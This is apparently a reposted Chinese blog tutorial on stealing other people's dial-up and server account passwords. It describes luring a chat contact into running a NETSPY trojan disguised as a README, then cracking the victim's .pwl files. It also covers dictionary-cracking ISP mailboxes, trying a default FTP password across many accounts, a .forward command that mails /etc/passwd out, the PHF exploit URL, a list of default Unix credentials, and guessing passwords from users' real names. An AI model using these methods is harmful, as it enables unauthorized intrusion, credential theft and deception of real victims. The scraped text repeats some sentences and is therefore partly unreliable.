做网站后台用什么语言,关于网站建设的申请书,关于网站建设的简历模板,凡科网站建设套餐报价如何得到别人的上网帐号和密码#xff0c;我在这里介绍几种弱智方法。方案一#xff1a;利用特洛伊***得到帐号。必备工具#xff1a;NTESPY、PWLVIEW。优点#xff1a;只要对方运行了程序就有80%的成功率#xff0c;而且不需要任何网络***知识#xff0c;只要能熟悉的操… 如何得到别人的上网帐号和密码我在这里介绍几种弱智方法。方案一利用特洛伊***得到帐号。必备工具NTESPY、PWLVIEW。优点只要对方运行了程序就有80%的成功率而且不需要任何网络***知识只要能熟悉的操作上面两个软件即可。NETSPY是全中文软件一看就会。而PWLVIEW又是弱智操作只要在DOS下输入PWLVIEW然后按回车即可。成功率高操作简单而且用不了多长时间是它最大的优点只是......缺点只有一个那就是如何让对方乖乖的运行你的程序。提示先问清你的目标和你是不是在一个城市。实战演戏一天我在X海聊天室里寻找目标遇见了同在北京的色鹅丢丢。我上前打招呼丢丢好呀。丢丢说你好呀。我又说XXXXXXX客套话先和他拉关系对了我拿到了一个新程序要不要看看丢丢说好呀寄给我吧。哈哈鱼上钩了先把诱饵程序改个名如改成readme之类的东东然后和一些不相干的东西发过去然后你让他先运行README。在这插一句有一位大侠使用此法时竟然把控制端程序和NETSPY的说明文件一起发了过去真搞不懂他怎么想的。我对他说你先运行README是中文说明。丢丢说好...咦怎么没反映呀(YEAH!)我又说那你直接运行软件吧。丢丢说好吧...不错...我说明天见...开始干活连上他的机子后现在C盘里找到了WIN95的目录WINDOWS。也有可能是WIN95或WIN98进入后查找*.pwl,然后把所有后缀名为PWL的文件都抓过来放在你的工具PWLVIEW的子目录里。在DOS窗口下输入PWLVIEW然后敲回车丢丢的上网帐号和密码就都显示出来了。而且以后如果他上网NETSPY就会通知你他就再也逃不出你的手掌心了。就算是他换了密码你也能在2分钟内再把他搞定。忠告你用他的帐号上网后第一件事就是先去查看他的上网时间。分析一下他一般几点上网以避免撞车。方案二利用ISP的疏忽做文章举。例用工具EMAILCRK或网络刺客优点没什么优点缺点要具体情况具体对待太麻烦提示平时多多留神。譬如某个ISP给你开好了帐号然后又画蛇添足的给你一个邮箱地址是你的帐号xxx.net密码和你的上网密码一样。也就是说只要你能敲开邮箱的密码就一切OK了。运行EMAILCRK或网络刺客套上字典后就等着。一般没有XX个小时搞不定不成功的可能性很大而且破解时还必须要上网。你的机子要是快可以开上三四个窗口套上不同的字典一起破方案三侵入邮局主机然后把PASS档抓回来然后用JOHN或JACK套上字典开始破。优点一次可以破出好多帐号而且如果运气好还能拿到ROOT这个主机就要归你控制了。而且破解时不用上网可以好几台机子一起破。缺点对于初学者有一定困难尤其是只想拿一个上网帐号这样做恐怕会得不偿失。而且被发现的可能性很大情节严重且性质恶劣一定要慎重对待。由于介绍此类的教学文章比较多我就不班门弄斧了。 哈哈我来说说最简单的***方法。其实***大体的原理相同主要是利用系统的漏洞BUG来做文章。只不过有的网站漏洞难找有的好找而已。一个好的***就是要能很快的发现漏洞并加以利用。下面我给大家举一个小栗子。有一天我去XX热线申请主页发现那里采用的是机器自动回信信的大概格式如下------------------------------XXX你好XX是你在表格上填的名字你在XX热线的主页空间已开通帐户名XXX 密码11-----------XX热线电话XXXX-XXXXXXXX------------------------------好了由于是机器回信所以那里所有人的初始密码都是11而且该热线要更改密码要TELNET到邮局主机去改有许多网友并没有接触过如何T主机所以他们使用的还是初始密码11。开始干活了打开FTP软件输入XX热线的IP密码11然后挨个输入帐户名。帐户名可去XX热线的主页空间列表里查看先试试AAAA。。。没成功再换一个AABB。。。还是不行。哈哈这个用户名短没准能行。输入AA。。。进去了。寄下用户名然后继续试ABC。。。又成功了看来没改密码的人很多呀。试几个就行了现在你已经拥有这些帐户的控制权了。上面的这个栗子很简单一般象这么大的漏很难找。要侵入一个稍微象点话的站台就要耗费你大量的时间和金钱而且还未必能成功。即使成功了你不改它实在无趣改了恐怕会步马X的后尘。此人侵入贵阳的主机并把界面换成了一张淫秽图片。害的自己吃饭不用花钱了。所以我在这里劝大家一句把这方面的精力放到全心全意为人民服务上去。实在不行就去聊天室看谁不听话就炸他同样很过瘾的 如何获得第一个帐号我们这种水平不高的******都是先得到系统的一个有效帐号,进入后再利用系统BUG得到ROOT权限或想办法得到SHADOW再解密.无论是利用系统漏洞还是得到SHADOW都是有一定规律可寻的,通常你到一些***站点找到对应系统相应版本的EXPLOIT编译后执行就行了.我感觉最困难的是获得第一个有效的帐号,有时侯费尽力气也得不到,后来总算是积累了一些经验,想写出来和大家交流一下,希望能抛砖引玉,请高手们把更好的方法告诉我.确定了目标以后,我通常是先用匿名FTP去看一下,许多网站都开匿名FTP,帐号用ANONYMOUS或是FTP,密码用一个EMAIL帐号(当然是假的),进入后到/etc目录下把PASSWD拿回来,一般情况下都是一份很不全的名单,只有几个系统帐号,那就算白来了:-}但有的时候会有比较傻的管理员把一些普通帐号放进去,这就是很重要的信息,虽然只有帐号没有密码,但毕竟迈出了第一步.如果FTP主目录是drwxr-xr-x做一个.foward文件传上去在UNIX下的命令应该是echo| /bin/cat /etc/passwd|sed s/^/ /|/bin/mail [email]memy.e-mail.addr[/email] .forward然后给匿名用户写一封信它会把PASSWD发给你。如果目标没有匿名FTP,就通过WWW访问它的主页,看看上面有什么信息,例如通过一些联系人的EMAIL你就可以发现一些帐号,有的网页上甚至列出了EMAIL通讯录,这对***来讲就是无价之宝.把这些帐号记下来,非常有用.以上几个方法都不行的话,那就试试PHF查询.在浏览器的地址栏输入http://***目标/cgi-bin/phf/?Qaliasx%0acat%20/etc/passwd如果成功的话会显示出PASSWD来,但是成功率极低:- 还可以利用目标的FINGER功能来积累帐号,如利用HAKTEK(一种扫描器)来监视目标,一旦有人登陆该主机就会报告给你.但这种方法的缺点就是浪费时间,如果你是自己花钱上网的话可就要出血了!很有可能以上的方法都不行,那只好使出我的看家本事了-------猜!!!有一些系统默认的帐号,例如:帐号 密码----------- ----------------root rootsys sys/system/binbin sys/binmountfsys mountfsysadm admuucp uucpnuucp anonanon anonuser usergames gamesinstall installreboot 给 command login 用的demo demoumountfsys umountfsyssync syncadmin adminguest guestdaemon daemon________________________________________________________________有些管理员忘记把他们改掉,那你就发财了!另外还有一些习惯性帐号如:test,www,html,web,oracle,setup,sybase,john,tom等也都应该试一试.只有帐号还不能进入系统,但有了帐号搞密码就容易一些了,主要办法还是猜.如果是通过PASSWD知道帐号的那你应该会发现该用户的许多信息,例如:.........xlguo:x:263:50:Guo xiaolin:/usr/xlguo:/bin/shqingyuan:x:275:50::/usr/qingyuan:/bin/shhjhuang:x:278:50:Huang Haijun:/usr/hjhuang:/bin/shsmlian:x:282:50:Mr. Lan Shumin:/usr/smlian:/bin/shkyc:x:293:50:Department of Science Technology:/usr/kyc:/bin/shbrlu:x:300:50:Lu Baoren:/usr/brlu:/bin/shtide:x:301:50:Wang XinYi:/usr/tide:/bin/sh............这是一部分PASSWD,从这儿我们可以得到七个帐号,注意每一行的第五项,那是该用户的真实姓名,对!就用它来做密码试.成功率还是比较高的.如果是用其他方法获得帐号的,就用FINGER查询来获得相关信息.例如知道一个帐号support,我们就用网络刺客II里的FINGER项来侦察[email]supportxxx.xxx.xxx[/email]会获得很多该帐号的信息例如真名实姓,电话号码等就用这些做密码来猜如果是用其他方法获得帐号的,就用FINGER查询来获得相关信息.例如知道一个帐号support,我们就用网络刺客II里的FINGER项来侦察[email]supportxxx.xxx.xxx[/email]会获得很多该帐号的信息例如真名实姓,电话号码等就用这些做密码来猜.当然最可能的密码还是帐号本身和一些帐号的变形,如帐号是john,密码可能是nhoj,john123,john888等.或是一些简单数字.总之是要费一番工夫来猜的.如果还猜不出密码,只好用LETMEIN之类的东西来猜,字典一定要好.否则,你的电话费就要.....而且这种方法比较危险,还是不用为好.最后实在不行还有一种比较卑劣的手段就是给该网站的网管写封信想办法骗他执行特洛伊***然后再.......算了,不说了. 转载于:https://blog.51cto.com/userli/66646
